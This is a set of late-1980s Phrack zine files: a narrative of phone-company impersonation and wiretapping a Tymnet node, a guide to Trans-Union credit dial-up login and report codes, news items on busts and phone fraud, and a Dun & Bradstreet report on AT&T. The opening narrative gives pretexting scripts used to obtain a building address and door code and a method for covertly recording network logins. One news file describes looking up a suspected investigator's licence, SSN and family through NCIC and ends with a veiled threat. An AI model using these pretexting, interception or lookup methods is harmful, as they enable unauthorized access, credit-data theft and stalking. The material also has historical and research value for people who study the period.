Tymnet's account. Here's a rough transcript:
Op: Pacific Bell priority customer order dept. How may I help you?
Me: Good Morning, this is Mr. Miller with Tymnet Inc. We're interested in
adding some service to our x town location.
Op: I'll be happy to help you Mr. Miller.
Me: I need to know how many lines we have coming in on our rotary and if we
have extra pairs on our trunk. We are considering adding ten additional
lines on that rotary and maybe some FX service.
Op: Ok....What's the number this is referenced to?
Me: xxx-xxx-xxxx (local node #)
Op: Hold on a min....Ok bla, bla, bla.
Well you get the idea. Anyway, after asking her a few more unimportant
questions I asked her for the address. No problem, she didn't even hesitate.
Of course this could have been avoided if the CN/A in my area would give out
addresses, but they don't, just listings. Dressed in my best telco outfit,
Pac*Bell baseball cap, tool belt and test set, I was out the door. There it
was, just an office building, even had a computer store in it. After
exploring the building for awhile, I found it. A large steel door with a push
button lock. Back to the phone. After finding the number where the service
techs were I called it and talked to the tech manager.
Mgr: Hello this is Joe Moron.
Me: Hi this is Mr. Miller (I like that name) with Pacific Bell. I'm down
here at your x town node and we're having problems locating a gas leak
in one of our Trunks. I believe our trunk terminates pressurization in
your room.
Mgr: I'm not sure...
Me: Well could you have someone meet me down here or give me the entry code?
Mgr: Sure the code is 1234.
Me: Thanks, I'll let you know if there's any trouble.
So, I ran home, got my VCR (stereo), and picked up another TRC from Trash
Shack. I connected the VCR to the first two incoming lines on the rotary.
One went to each channel (left,right). Since the volume of calls is almost
consistent, it wasn't necessary to stop the recorder between calls. I just
let it run. I would come back the next day to change the tape. The VCR was
placed under the floor in case a tech happened to come by for maintenance.
These nodes are little computer rooms with air conditioners and raised floors.
The modems and packet switching equipment are all rack mounted behind glass.
Also, most of the nodes are unmanned. What did I get? Well a lot of the
logins were 1200, so I never found out what they were. Still have 'em on tape
though! Also a large portion of traffic on both Tymnet and Telenet is those
little credit card verification machines calling up Visa or Amex. The
transaction takes about 30 secs and there are 100's on my tapes. The rest is
as follows:
Easylink CompuServe Quantumlink 3Mmail
PeopleLink Homebanking USPS Chrysler parts order
Yamaha Ford Dow Jones
And a few other misc. systems of little interest. I'm sure if I was
persistent, I'd get something a little more interesting. I spent several
months trying to figure out my 1200 baud problem. When I went back down there
the code had been changed. Why? Well I didn't want to find out. I was out
of there! I had told a couple of people who I later found could not be
trusted. Oh well. Better safe than sorry.
**************************************
Well, if you need to reach me,try my VMS at 415-338-7000 box 8130. But no
telling how long that will last. And of course there's always P-80 systems at
304-744-2253. Probably be there forever. Thanks Scan Man, whoever you are.
Also read my file on telco local loop wiring. It will help you understand how
to find the line you are looking for. It should be called Telcowiring.Txt
<<< AGENT STEAL >>>

205
phrack16/7.txt Normal file
View file

@ -0,0 +1,205 @@
===== Phrack Magazine presents Phrack 16 =====
===== File 7 of 12 =====
------------------------------------------------------------------------
- The Disk Jockey -
- presents: -
- -
- Reading Trans-Union Reports: -
- A lesson in terms used -
- (A 2af presentation) -
------------------------------------------------------------------------
This file is dedicated to all the phreaks/hacks that were busted in the summer
of 1987, perhaps one of the most crippling summers ever for us.
Preface:
-------
Trans-Union is a credit service much like CBI, TRW or Chilton, but offers
more competitive rates, and is being used more and more by many credit
checking agencies.
Logging in:
----------
Call one of the Trans Union dial-ups at 300,E,7,1, Half Duplex. Such a
dial-up is 314-XXX-XXXX. After connecting, hit Ctrl-S. The system will echo
back a 'GO ' and then awaits you to begin the procedure of entering the
account and password, then mode, i.e.: S F1111,111,H,T. The system will
then tell you what database you are logged on to, which is mostly
insignificant for your use. To then pull a report, you would type the
following: P JONES,JIM* 2600,STREET,CHICAGO,IL,60604** <Ctrl-S>. The name
is Jim Jones, 2600 is his street address, street is the street name, Chicago
is the city, IL is the state, 60604 is the zip.
The Report:
----------
The report will come out, and will look rather odd, with all types of
notation. An example of a Visa card would be:
SUB NAME/ACCT# SUB# OPEND HICR DTRP/TERM BAL/MAX.DEL PAY.PAT MOP
CITIBANK B453411 3/87 $1000 9/87A $0 12111 R01
4128XXXXXXXXX $1500 5/87 $120
Ok, Citibank is the issuing bank. B453411 is their subscriber code. 3/87 is
when the account was opened. HICR is the most that has been spent on that
card. 9/87 is when the report was last updated (usually monthly if active).
$1000 is the credit line. $0 is the current balance. 12111 is the payment
pattern, where 1=pays in 30 days and 2=pays in 60 days. R01 means that it is a
"Revolving" account, meaning that he can make payments rather than pay the
entire bill at once. 4128-etc is his account number (card number). $1500 is
his credit line. 5/87 is when he was late on a payment last. $120 is the
amount that he was late with.
Here is a list of terms that will help you identify and understand the reports
better:
ECOA Inquiry and Account Designators
------------------------------------
I Individual account for sole use of applicant
C Joint spousal contractual liability
A Authorized user of shared account
P Participant in use of account that is neither C nor A
S Co-signer, not spouse
M Maker primarily liable for account, co-signer involved
T Relationship with account terminated
U Undesignated
N Non-Applicant spouse inquiry
Remarks and FCBA Dispute Codes
------------------------------
AJP Adjustment pending
BKL Bankruptcy loss
CCA Consumer counseling account
CLA Placed for collection
CLO Closed to further purchases
CTS Contact Subscriber
DIS Dispute following resolution
DRP Dispute resolution pending
FCL Foreclosure
MOV Moved, left no forwarding address
ND No dispute
PRL Profit and loss write-off
RFN Account refinanced
RLD Repossession, paid by dealer
RLP Repossession, proceeds applied towards debt
RPO Repossession
RRE Repossession, redeemed
RS Dispute resolved
RVD Returned voluntarily, paid by dealer
RVN Returned voluntarily
RVP Returned voluntarily, proceeds go towards debt
RVR Returned voluntarily, redeemed
SET Settled for less than full balance
STL Plate (card) stolen or lost
TRF Transferred to another office
Type of Account
---------------
O Open account (30 or 90 days)
R Revolving or option account (open-end)
I Installment (fixed number of payments)
M Mortgage
C Check credit (line of credit at a bank)
Usual Manner of Payment
-----------------------
00 Too new to rate; approved, but not used or not rated
01 Pays (or paid) within 30 days of billing, pays accounts as agreed
02 Pays in more than 30 days, but not more than 60 days
03 Pays in more than 60 days, but not more than 90 days
04 Pays in more than 90 days, but not more than 120 days
05 Pays in 120 days or more
07 Makes payments under wage earner plan or similar arrangement
08 Repossession
8A Voluntary repossession
8D Legal repossession
8R Redeemed repossession
09 Bad debt; placed for collection; suit; judgement; skip
9B Placed for collection
UR Unrated
UC Unclassified
Kinds of Business Classification
-------------------------------
A Automotive
B Banks
C Clothing
D Department and variety
F Finance
G Groceries
H Home furnishings
I Insurance
J Jewelry and cameras
K Contractors
L Lumber, building materials
M Medical and related health
N National credit card
O Oil and national credit card
P Personal services other than medical
Q Mail order houses
R Real estate and public accommodations
S Sporting goods
T Farm and garden supplies
U Utilities and fuel
V Government
W Wholesale
X Advertising
Y Collection services
Z Miscellaneous
Type of Installment Loan
------------------------
AF Appliance/Furniture
AP Airplane
AU Automobile
BT Boat
CA Camper
CL Credit line
CM Co-maker
CO Consolidation
EQ Equipment
FH FHA contract loan
FS Finance statement
HI Home improvement
IN Insurance
LE Leases
MB Mobile home
MC Miscellaneous
MT Motor home
PI Property improvement plan
PL Personal loan
RE Real estate
ST Student loan
SV Savings bond, stock, etc.
US Unsecured
VA Veteran loan
Date Codes
----------
A Automated, most current information available
C Closed date
F Repossessed/Written off
M Further updates stopped
P Paid
R Reported data
S Date of last sale
V Verified date
Employment Verification Indicator
---------------------------------
D Declined verification
I Indirect
N No record
R Reported, but not verified
S Slow answering
T Terminated
V Verified
X No reply
Hope this helps. Anyone that has used Trans-Union will surely appreciate
this, as the result codes are sometimes hard to decipher.
-The Disk Jockey

69
phrack16/8.txt Normal file
View file

@ -0,0 +1,69 @@
#### PHRACK PRESENTS ISSUE 16 ####
^*^*^*^Phrack World News, Part 1^*^*^*^
**** File 8 of 12 ****
>From the 9/16 San Francisco Chronicle, page A19:
GERMAN HACKERS BREAK INTO NASA NETWORK (excerpted)
Bonn
A group of West German computer hobbyists broke into an international
computer network of the National Aeronautics and Space Administration and
rummaged freely among the data for at least three months before they were
discovered, computer enthusiasts and network users said yesterday.
An organization in Hamburg called the Chaos Computer Club, which
claimed to be speaking for an anonymous group that broke into the network,
said the illicit users managed to install a "Trojan horse," and gain entry
into 135 computers on the European network.
A "Trojan Horse" is a term for a permanent program that enables
amateur computer enthusiasts [as opposed to professionals?], or "hackers,"
to use a password to bypass all the security procedures of a system and gain
access to all the data in a target computer.
[Actually, this type of program is a 'back door' or a 'trap door.' The group
may very well have *used* a Trojan horse to enable them to create the back
door, but it probably wasn't a Trojan horse per se. A Trojan horse is a
program that does something illicit and unknown to the user in addition to its
expected task. See Phrack xx-x, "Unix Trojan Horses," for info on how to
create a Trojan horse which in turn creates a trap door into someone's
account.]
The NASA network that was broken into is called the Space Physics
Analysis Network [ooh!] and is chiefly designed to provide authorized
scientists and organizations with access to NASA data. The security system in
the network was supplied by an American company, the Digital Equipment Corp.
[Probably DECNET. Serves them right.] Users said the network is widely used
by scientists in the United States, Britain, West Germany, Japan and five
other countries and does not carry classified information.
A Chaos club spokesman, Wau Holland, denied that any data had been
changed. This, he said, went against "hacker ethics."
West German television reports said that computer piracy carries a
penalty of three years in prison in West Germany. The government has not said
what it plans to do.
The Chaos club clearly views its break-in as a major coup. Holland,
reached by telephone in Hamburg, said it was "the most successful running of a
Trojan horse" to his knowledge, and the club sent a lengthy telex message to
news organizations.
It said the "Trojan horse" was spotted by a user in August, and the
infiltrating group then decided to go public because "they feared that they
had entered the dangerous field of industry espionage, economic crime, East-
West conflict...and the legitimate security interests of high-tech
institutions."
The weekly magazine Stern carried an interview with several anonymous
hobbyists who showed how they gained access to the network. One described his
excitement when for the first time he saw on his screen, "Welcome to the NASA
headquarters VAX installation."
According to Chaos, the hobbyists discovered a gap in the Digital VAX
systems 4.4 and 4.5 and used it to install their "Trojan Horse."
[Excerpted and Typed by Shooting Shark. Comments by same.]

51
phrack16/9.txt Normal file
View file

@ -0,0 +1,51 @@
#### PHRACK PRESENTS ISSUE 16 ####
^*^*^*^Phrack World News, Part 2^*^*^*^
**** File 9 of 12 ****
[Ed's Note: CertainThings in the article have been blanked (XXXXX) at the
request of the author]
The Story of the Feds on XXXXXXX BBS
By The Mad Phone Man
Returninghome one afternoon with a friend, I knew something wasn't
right when I walked into the computer room. I see a "Newuser" on the board...
and the language he's using is... well "Intimidating"...
"I want you all to know I'm with the OCC task force and we know who you are...
we are going to have a little get-together and 'talk' to you all."
Hmmm... a loser?... I go into chat mode... "Hey dude, what's up?" I ask.
"Your number asshole" he says.... Well, fine way to log on to a board if I do
say.... "Hey, you know I talked to you and I know who you are.." "Oh
yeah...Who am I?." he hesitates and says... "Well uh.. you used to work for
Sprint didn't you?"
I say, "No, you've got me confused with someone else I think, I'm a junior
in high school."
"Ohyeah?.. You got some pretty big words for a high school kid," he
says....
"Well, in case you didn't know, they teach English as a major these
days...."
He says... "Do you really want to know which LD company I'm with?"
I say "NO, but if it will make you happy, tell me."
He says MCI. (Whew! I don't use them)... "Well you're outta luck
asshole, I pay for my calls, and I don't use MCI." He's dumbfounded.
I wish him the worst as he asks me to leave his rather threatening
post up on my board and we hang up on him.
Now, I'm half paralyzed... hmmm.... Check his info-form... he left a
number in 303... Denver.... I grab the phone and call it.. It's the Stromberg
Telephone company... Bingo.. I've got him.
I search my user files and come up with a user called "Cocheese" from
there, and I voice validated him, and he said he worked for a small telco
called Stromberg... I'm onto him now.
Later in the week, I'm in a telco office in a nearby major city, I
happen to see a book, marked "Confidential Employee Numbers for AT&T." I
thumb thru and lo and behold, an R.F. Stromberg works at an office of AT&T in
Denver, and I can't cross reference him to an office. (A sure sign he's in
security). Well, not to be out-done by this loser... I dial up NCIC and check
for a group search for a driver's licence for him... Bingo. Licence number,
cars he owns, his SS number, and a cross reference of the licence files finds
his wife, two kids and a boat registered to him.
I've never called him back, but If I do have any trouble with him, I'm
gonna pay a little visit to Colorado....

50
phrack17/1.txt Normal file
View file

@ -0,0 +1,50 @@
% = % = % = % = % = % = % = %
= =
% P h r a c k X V I I %
= =
% = % = % = % = % = % = % = %
Phrack Seventeen
07 April 1988
File 1 of 12 : Phrack XVII Introduction
It's been a long time, but we're back. After two successful releases
under the new editorship, Taran King told us that with his vacation from
school, he'd be able to put Phrack Seventeen together. His plans soon
changed, and Seventeen was now our responsibility again. Procrastination set
in, and some difficulty was encountered in compiling the files, but we finally
did it and here it is.
There's a lot of good material in this issue, and we're lucky enough to
have PWN contributions from several sources, making it a true group effort.
Since The Mad Chemist and Sir Francis Drake, as well as myself, are moving on
to other things, the editorship of Phrack Inc. may be changing with the
release of Phrack Eighteen. Regardless of what direction the publication
takes, I know that I will have no part in the creation of the next issue, so
I'd like to mention at this time that my involvement with the magazine, first
as a contributor and later as a contributing editor, has been fun. Phrack
will go on, I'm sure, for another seventeen issues at least, and will continue
to be a primary monument to the vitality of the hacker culture.
-- Shooting Shark
Contributing Editor
Phrack XVII Table of Contents
-----------------------------
# Title Author Size
---- ----- ------ ----
17.1 Phrack XVII Introduction Shooting Shark 3K
17.2 Dun & Bradstreet Report on AT&T Elric of Imrryr 24K
17.3 D&B Report on Pacific Telesis Elric of Imrryr 26K
17.4 Nitrogen-Trioxide Explosive Signal Substain 7K
17.5 How to Hack Cyber Systems Grey Sorcerer 23K
17.6 How to Hack HP2000's Grey Sorcerer 3K
17.7 Accessing Government Computers The Sorceress 9K
17.8 Dial-Back Modem Security Elric of Imrryr 11K
17.9 Data Tapping Made Easy Elric of Imrryr 4K
17.10 PWN17.1 Bust Update Sir Francis Drake 3K
17.11 PWN17.2 "Illegal" Hacker Crackdown The $muggler 5K
17.12 PWN17.3 Cracker are Cheating Bell The Sorceress 8K

99
phrack17/10.txt Normal file
View file

@ -0,0 +1,99 @@
#### PHRACK PRESENTS ISSUE 17 ####
^*^*^*^ Phrack World News, Part 1 ^*^*^*^
**** File 10 of 12 ****
- P H R A C K W O R L D N E W S -
(Mainly Compiled By Sir Francis Drake)
2/1/88
BUST UPDATE
===========
All the people busted by the Secret Service last July were contacted in
September and asked if they "wanted to talk." No one but Solid State heard
from the S.S. after this. Solid State was prosecuted and got one year
probation plus some required community service. The rest: Ninja NYC, Bill
>From RNOC, Oryan QUEST, etc. are still waiting to hear. Some rumors have gone
around that Oryan QUEST has cooperated extensively with the feds but I have no
idea about the validity of this. The following is a short interview with
Oryan QUEST. Remember that QUEST has a habit of lying.
PHRACK: Did you hear from the SS in September? It seems everybody else has.
QUEST: No. I haven't heard from them since I was busted. Maybe they forgot
me.
P: What's your lawyer think of your case?
Q: He says lay low. He says it's no problem because of my age.
P: What do your parents think?
Q: They were REALLY pissed for about a week but then they relaxed. I mean I
think my parents knew I went through enough... I mean I felt like shit.
P: Do you plan to keep involved in Telecom legit or otherwise?
Q: Uhh, I wanna call boards... I mean I can understand why a sysop wouldn't
give me an access but... I'm thinking of putting a board up, a secure
board just to stay in touch ya know? Cause I had a lot of fun I mean I
just don't want to get busted again.
P: Any further words of wisdom?
Q: No matter what anyone says I'm *ELITE*. NOOOO don't put that.
P: Yes I am.
Q: No I don't want people to think I'm a dick.
P: Well...
Q: You're a dick.
- On a completely different note, Taran King who as some of you know was
busted, is going to be writing a file for Phrack about what happened real
soon now.
MEDIA
=====
The big media thing has been scare stories about computer viruses,
culminating in a one page Newsweek article written by good old Sandza and
friends. John Markoff of the San Francisco Examiner wrote articles on
viruses, hacking voice mailboxes, and one that should come out soon about the
July Busts (centering on Oryan QUEST). A small scoop: He may be leaving for
the New York Times or the San Jose Mercury.
Phreak media wise things have been going downhill. Besides PHRACK (which
had a bad period but hopefully we're back for good) there is 2600, and
Syndicate Report. Syndicate Report is dead, although their voice mail system
is up. Sometimes. 2600 has gone from a monthly magazine to a quarterly one
because they were losing so much money. One dead and 2 wounded.
MISCELLANEOUS
=============
Taran King and Knight Lightning are having a fun time in their fraternity
at University of Missouri. Their respective GPA's are 2.1 and 2.7
approximately.... Phantom Phreaker and Doom Prophet are in a (punk/metal)
band... Lex Luthor is alive and writing long articles for 2600... Sir Francis
Drake sold out and wrote phreak articles for Thrasher... Jester Sluggo has
become vaguely active again...
CONCLUSION
==========
Less and less people are phreaking, the world is in sorry shape, and I'm going
to bed. Hail Eris.
sfd

107
phrack17/11.txt Normal file
View file

@ -0,0 +1,107 @@
#### PHRACK PRESENTS ISSUE 17 ####
^*^*^*^ Phrack World News, Part 2 ^*^*^*^
**** File 11 of 12 ****
"Illegal Hacker Crackdown"
from the California Computer News - October 1987
Article by Al Simmons - CCN Editor
Hackers beware!
Phone security authorities, the local police, and the Secret Service have been
closing down on illegal hacking - electronic thievery - that is costing the
long-distance communications companies and their customers millions of dollars
annually. In the U.S., the loss tally on computer fraud, of all kinds, is now
running between $3 billion and $5 a year, according to government sources.
"San Francisco D.A. Gets First Adult Conviction for Hacking"
(After about 18 years, it's a about time!)
San Francisco, District Attorney Arlo Smith recently announced the first
criminal conviction in San Francisco Superior Court involving an adult
computer hacker.
In a report released August 31, the San Francisco District Attorney's office
named defendant Steve Cseh, 25, of San Francisco as having pled guilty earlier
that month to a felony of "obtaining telephone services with fraudulent
intent" (phreaking) by means of a computer.
Cseh was sentenced by Superior Court Judge Laurence Kay to three years
probation and ordered to preform 120 hours of community service.
Judge Kay reduced the offense to a misdemeanor in light of Cseh's making full
restitution to U.S. Sprint - the victim phone company.
At the insistence of the prosecuting attorney, however, the Court ordered Cseh
to turn his computer and modem over to U.S. Sprint to help defray the phone
company's costs in detecting the defendant's thefts. (That's like big money
there!)
A team of investigators from U.S. Sprint and Pac Tel (the gestapo) worked for
weeks earlier this year to detect the hacking activity and trace it to Cseh's
phone line, D.A. Arlo Smith said.
The case centered around the use of a computer and its software to illegally
acquire a number of their registered users to make long-distance calls.
Cseh's calls were monitored for a three-week period last March. After tracing
the activity to Cseh's phone line, phone company security people (gestapo
stormtroopers) were able to obtain legal authority, under a federal phone
communications statute, to monitor the origin and duration of the illegal
calls.
Subsequently, the investigators along with Inspector George Walsh of the San
Francisco Police Dept. Fraud Detail obtained a search warrant of Cseh's
residence. Computer equipment, a software dialing program, and notebooks
filled with codes and phone numbers were among the evidence seized, according
to Asst. D.A. Jerry Coleman who prosecuted the case.
U.S Sprint had initially reported more than $300,000 in losses from the use of
their codes during the past two years; however, the investigation efforts
could only prove specific losses of a lesser amount traceable to Cseh during
the three-week monitoring period.
"It is probable that other computer users had access to the hacked Sprint
codes throughout the country due to dissemination on illegal computer bulletin
boards," added Coleman (When where BBS's made illegal Mr. Coleman?)
"Sacramento Investigators Breakup Tahoe Electronic Thefts"
Meanwhile, at South Shore Lake Tahoe, Secret Service and phone company
investigators arrested Thomas Gould Alvord, closing down an electronic theft
ring estimated to have rung up more than $2 million in unauthorized calls.
A Sacramento Bee story, filed by the Bee staff writers Ted Bell and Jim Lewis,
reported that Alvord, 37, was arrested September 9, on five felony counts of
computer hacking of long-distance access codes to five private telephone
companies.
Alvord is said to have used an automatic dialer, with computer programmed
dialing formulas, enabling him to find long-distance credit card numbers used
by clients of private telephone companies, according to an affidavit filed in
Sacramento's District Court.
The affidavit, filed by William S. Granger, a special agent of the Secret
Service, identified Paula Hayes, an investigator for Tel-America of Salt Lake
City, as the undercover agent who finally brought an end to Alvord's South
Shore Electronic Co. illegal hacking operation. Hayes worked undercover to
purchase access codes from Alvord.
Agent Garanger's affidavit lists U.S. Sprint losses at $340,000 but Sprint
spokesman Jenay Cottrell said that figure "could grow considerably," according
to the Bee report.
One stock brokerage firm, is reported to have seen its monthly Pacific Bell
telephone bill climb steadily from $3,000 in April to $72,000 in August. The
long-distance access codes of the firm were among those traced to Alvord's
telephones, according to investigators the Bee said.
Alvord was reportedly hacking access codes from Sprint, Pacific Bell, and
other companies and was selling them to truck drivers for $60 a month. Alvord
charged companies making overseas calls and larger businesses between $120 and
$300 a month for the long-distance services of his South Shore Electronics Co.
>From The $muggler

145
phrack17/12.txt Normal file
View file

@ -0,0 +1,145 @@
#### PHRACK PRESENTS ISSUE 17 ####
^*^*^*^ Phrack World News, Part 3 ^*^*^*^
**** File 12 of 12 ****
+-------------------------------------------------------------------------+
-[ PHRACK XVII ]-----------------------------------------------------------
"The Code Crackers are Cheating Ma Bell"
Typed by the Sorceress from the San Francisco Chronicle
Edited by the $muggler
The Far Side..........................(415)471-1138
Underground Communications, Inc.......(415)770-0140
+-------------------------------------------------------------------------+
In California prisons, inmates use "the code" to make free telephone calls
lining up everything from gun running jobs to visits from grandma.
In a college dormitory in Tennessee, students use the code to open up a
long-distance line on a pay phone for 12 straight hours of free calls.
In a phone booth somewhere in the Midwest, a mobster uses the code to make
untraceable calls that bring a shipment of narcotics from South America to the
United States.
The code is actually millions of different personal identification numbers
assigned by the nation's telephone companies. Fraudulent use of those codes
is now a nationwide epidemic that is costing America's phone companies more
than $500 million each year.
In the end, most of that cost is passed on to consumers, in the form of higher
phone rates, analysts say.
The security codes range form multidigit access codes used by customers of the
many alternative long-distance companies to the "calling card" numbers
assigned by America Telephone & Telegraph and the 22 local phone companies,
such as Pacific Bell.
Most of the loss comes form the activities of computer hackers, said Rene
Dunn, speaking for U.S. Sprint, the third-largest long-distance company.
These technical experts - frequently bright, if socially reclusive, teenagers
- set up their computers to dial the local access telephone number of one of
the alternative long-distance firms, such as MCI and U.S. Sprint. When the
phone answers, a legitimate customer would normally punch in a secret personal
code, usually five digits, that allows him to make his call.
Hackers, however, have devised computer programs that will keep firing
combinations of numbers until it hits the right combination, much like a
safecracker waiting for the telltale sound of pins and tumblers meshing.
Then the hacker- known in the industry as a "cracker" because he has cracked
the code- has full access to that customer's phone line.
The customer does not realize what has happened until a huge phone bill
arrives at the end of the month. By that time, his access number and personal
code have been tacked up on thousands of electronic bulletin boards throughout
the country, accessible to anyone with a computer, a telephone and a modem,
the device that allows the computer to communicate over telephone lines.
"This is definitely a major problem," said one telephone security expert, who
declined to be identified. "I've seen one account with a $98,000 monthly
bill."
One Berkeley man has battled the telephone cheats since last fall, when his
MCI bill showed about $100 in long-distance calls he had not made.
Although MCI assured him that the problem would be taken care of, the man's
latest bill was 11 pages long and has $563.40 worth of long-distance calls.
Those calls include:
[] A two-hour call to Hyattsville, Maryland, on January 22. A woman who
answered the Hyattsville phone said she had no idea who called her house.
[] Repeated calls to a dormitory telephone at UCLA. The student who answered
the phone there said she did not know who spent 39 minutes talking to her,
or her roommate, shortly after midnight on January 23.
[] Calls to dormitory rooms at Washington State University in Pullman and to
the University of Colorado in Boulder. Men who answered the phones there
professed ignorance of who had called them or of any stolen long-distance
codes.
The Berkeley customer, who asked not to be identified, said he reached his
frustration limit and canceled his MCI account.
The phone companies are pursing the hackers and other thieves with methods
that try to keep up with a technological monster that is linked by trillions
of miles of telephone lines.
The companies sometimes monitor customers' phone bills. If a bill that
averages about $40 or $50 a month suddenly soars to several hundred dollars
with calls apparently placed from all over the country on the same day, the
phone company flags the bill and tries to track the source of the calls.
The FBI makes its own surveillance sweeps of electronic bulletin boards,
looking for stolen code numbers. The phone companies occasionally call up
these boards and post messages, warning that arrest warrants will be coming
soon if the fraudulent practice does not stop. Reputable bulletin boards post
their own warnings to telephone hackers, telling them to stay out.
Several criminal prosecutions are already in the works, said Jocelyne Calia,
the manager of toll fraud for U.S. Sprint.
If the detectives do not want to talk about their methods, the underground is
equally circumspect. "If they (the companies) have effective (prevention)
methods, how come all this is still going on?" asked one computer expert, a
veteran hacker who says he went legitimate about 10 years ago.
The computer expert, who identified himself only as Dr. Strange, said he was
part of the original group of electronic wizards of the early 1970s who
devised the "blue boxes" complex instruments that emulate the tones of a
telephone and allowed these early hackers to break into the toll-free 800
system and call all over the world free of charge.
The new hacker bedeviling the phone companies are simply the result of the
"technology changing to one of computers, instead of blue boxes" Dr. Strange
said. As the "phone company elevates the odds... the bigger a challenge it
becomes," he said.
A feeling of ambivalence toward the huge and largely anonymous phone companies
makes it easier for many people to rationalize their cheating. A woman in a
Southwestern state who obtained an authorization code from her boyfriend said,
through an intermediary, that she never really thought of telephone fraud as a
"moral issue." "I don't abuse it," the woman said of her newfound telephone
privilege. "I don't use it for long periods of time - I never talk for more
than an hour at a time - and I don't give it out to friends." Besides, she
said, the bills for calls she has been making all over the United States for
the past six weeks go to a "large corporation that I was dissatisfied with.
It's not as if an individual is getting the bills."
There is one place, however, where the phone companies maybe have the upper
hand in their constant war with the hackers and cheats.
In some prisons, said an MCI spokesman, "we've found we can use peer pressure.
Let's say we restrict access to the phones, or even take them out, and there
were a lot of prisoners who weren't abusing the phone system. So the word
gets spread to those guys about which prisoner it was that caused the
telephones to get taken out. Once you get the identification (of the
phone-abusing prisoner) out there, I don't think you have to worry much" the
spokesman said. "There's a justice system in the prisons, too."

461
phrack17/2.txt Normal file
View file

@ -0,0 +1,461 @@
% = % = % = % = % = % = % = %
= =
% P h r a c k X V I I %
= =
% = % = % = % = % = % = % = %
Phrack Seventeen
07 April 1988
File 2 of 12 : Dun & Bradstreet Report on AT&T
AT&T Credit File, taken from Dun & Bradstreet by Elric of Imrryr
DUN'S FINANCIAL RECORDS
COPYRIGHT (C) 1987
DUN & BRADSTREET CREDIT SERVICE
Name & Address:
AMERICAN TELEPHONE AND TELEGRAPH Trade-Style Name:
550 Madison Ave AT & T
NEW YORK, NY 10022
Telephone: 212-605-5300
DUNS Number: 00-698-0080
Line of Business: TELECOMMUNICATIONS SVCS TELE
Primary SIC Code: 4811
Secondary SIC Codes: 4821 3661 3357 3573 5999
Year Started: 1885 (12/31/86) COMBINATION FISCAL
Employees Total: 317,000 Sales: 34,087,000,000
Employees Here: 1,800 Net Worth: 14,462,000,000
This is a PUBLIC company
12/31/86 COMBINATION FISCAL
(Figures are in THOUSANDS)
FINANCIALS % COMPANY INDST
COMPANY CHANGE % NORM %
Cash. . . . . . . . . . . . . 2,602,000 17.5 6.7 9.0
Accounts Receivable . . . . . 7,820,000 (13.1) 20.1 5.7
Notes Receivable. . . . . . . ---- ---- ---- 0.2
Inventory . . . . . . . . . . 3,519,000 (26.1) 9.1 1.3
Other Current Assets. . . . . 1,631,000 72.0 4.2 5.8
Total Current Assets. . . . . 15,572,000 (8.0) 40.0 22.0
Fixed Assets. . . . . . . . . 21,078,000 (4.7) 54.2 35.6
Other Non-current Assets. . . 2,233,000 55.9 5.7 42.4
Total Assets. . . . . . . . . 38,883,000 (3.9) 100.0 100.0
Accounts Payable. . . . . . . 4,625,000 (6.4) 11.9 4.2
Bank Loans. . . . . . . . . . ---- ---- ---- 0.2
Notes Payable . . . . . . . . ---- ---- ---- 1.0
Other Current Liabilities . . 6,592,000 0.8 17.0 6.2
Total Current Liabilities . . 11,217,000 (2.4) 28.8 11.6
Other Long Term Liab. . . . . 13,204,000 38.2 34.0 46.8
Deferred Credits. . . . . . . ---- ---- ---- 6.4
Net Worth . . . . . . . . . . 14,462,000 (1.2) 37.2 35.2
Total Liabilities & Worth. . 38,883,000 (3.9) 100.0 100.0
Net Sales . . . . . . . . . . 34,087,000 (2.4) 100.0 100.0
Gross Profit. . . . . . . . . 15,838,000 ---- 46.5 40.1
Net Profit After Tax. . . . . 139,000 (91.1) 0.4 15.3
Dividends/Withdrawals . . . . 1,371,000 (0.9) 4.0 7.7
Working Capital . . . . . . . 4,355,000 (19.8) ---- ----
RATIOS % ---INDUSTRY QUARTILES---
COMPANY CHANGE UPPER MEDIAN LOWER
(SOLVENCY)
Quick Ratio . . . . . . . . . 0.9 (10.0) 2.9 1.2 0.6
Current Ratio . . . . . . . . 1.4 (6.7) 4.9 2.2 1.0
Curr Liab to Net Worth (%). . 77.6 (1.1) 13.2 26.4 38.1
Curr Liab to Inventory (%). . 318.8 32.1 244.8 475.8 675.0
Total Liab to Net Worth (%) . 168.9 (4.3) 127.4 180.2 297.2
Fix Assets to Net Worth (%) . 145.7 (3.6) 144.9 215.0 263.0
(EFFICIENCY)
Coll Period (days). . . . . . 83.7 (11.1) 31.9 46.7 61.6
Sales to Inventory. . . . . . 9.7 32.9 56.2 33.8 20.0
Assets to Sales (%) . . . . . 114.1 (1.6) 210.5 266.1 373.4
Sales to Net Working Cap. . . 7.8 21.9 6.3 2.3 1.1
Acct Pay to Sales (%) . . . . 13.6 (4.2) 4.9 8.7 13.8
(PROFITABILITY)
Return on Sales (%) . . . . . 0.4 (91.1) 20.1 14.6 11.3
Return on Assets (%). . . . . 0.4 (89.5) 7.2 5.7 3.7
Return on Net Worth (%) . . . 1.0 (90.6) 19.0 15.9 12.8
Industry norms based on 469 firms,
with assets over $5 million.
12/31/85 COMBINATION FISCAL
(Figures are in THOUSANDS)
FINANCIALS % COMPANY INDST
COMPANY CHANGE % NORM %
Cash. . . . . . . . . . . . . 2,213,700 3.4 5.5 7.5
Accounts Receivable . . . . . 8,996,100 (4.0) 22.2 5.6
Notes Receivable. . . . . . . ---- ---- ---- 0.4
Inventory . . . . . . . . . . 4,759,300 (0.6) 11.8 1.2
Other Current Assets. . . . . 948,500 (8.2) 2.3 5.1
Total Current Assets. . . . . 16,917,600 (2.4) 41.8 19.8
Fixed Assets. . . . . . . . . 22,112,900 5.2 54.7 39.2
Other Non-current Assets. . . 1,432,000 (3.2) 3.5 41.0
Total Assets. . . . . . . . . 40,462,500 1.6 100.0 100.0
Accounts Payable. . . . . . . 4,942,800 (11.4) 12.2 4.9
Bank Loans. . . . . . . . . . ---- ---- ---- 0.3
Notes Payable . . . . . . . . 2,100 ---- ---- 0.8
Other Current Liabilities . . 6,542,600 15.5 16.2 5.9
Total Current Liabilities . . 11,487,500 2.2 28.4 11.9
Other Long Term Liab. . . . . 9,553,200 2.7 23.6 46.8
Deferred Credits. . . . . . . 4,788,500 18.9 11.8 6.8
Net Worth . . . . . . . . . . 14,633,300 (4.1) 36.2 34.5
Total Liabilities & Worth. . 40,462,500 1.6 100.0 100.0
Net Sales . . . . . . . . . . 34,909,500 5.2 100.0 100.0
Gross Profit. . . . . . . . . ---- ---- ---- 33.7
Net Profit After Tax. . . . . 1,556,800 13.6 4.5 14.0
Dividends/Withdrawals . . . . 1,382,900 3.7 4.0 13.0
